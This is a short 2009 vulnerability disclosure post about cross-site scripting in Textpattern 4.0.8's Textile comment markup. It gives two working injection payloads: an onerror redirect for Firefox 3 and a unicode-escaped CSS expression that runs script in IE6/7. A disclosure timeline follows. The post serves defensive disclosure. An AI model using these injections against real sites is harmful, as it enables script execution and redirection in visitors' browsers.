Sunday, 02 August 2009 21:03
Textpattern 4.0.8, a PHP based CMS, has a unique approach to allowing user styled input: Textile. This BBCode-type markup allows users to easily style comments. It is also vulnerable to XSS.
A few caveats:
  • no spaces
  • no parentheses
  • no tags ( <> )
  • submission is only possible after the first preview

FF3 (limited, but redirection is possible):

!http://foo.com/fake.png"/onerror="location.href='http://google.com'!

Script execution in IE6/7 (poc - alerts 'XSS' ):

!http://foo.com/fake.png"/style="xss:\0065\0078\0070\0072\0065\0073\0073\0069\006f\006e\0028\0061\006c\0065\0072\0074\0028\0053\0074\0072\0069\006e\0067\002e\0066\0072\006f\006d\0043\0068\0061\0072\0043\006f\0064\0065\0028\0038\0038\002c\0020\0038\0033\002c\0020\0038\0033\0029\0029\0029!

Timeline

  • Vulnerabilities Discovered: 2 August 2009
  • Vendor Notified: 2 August 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:39
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions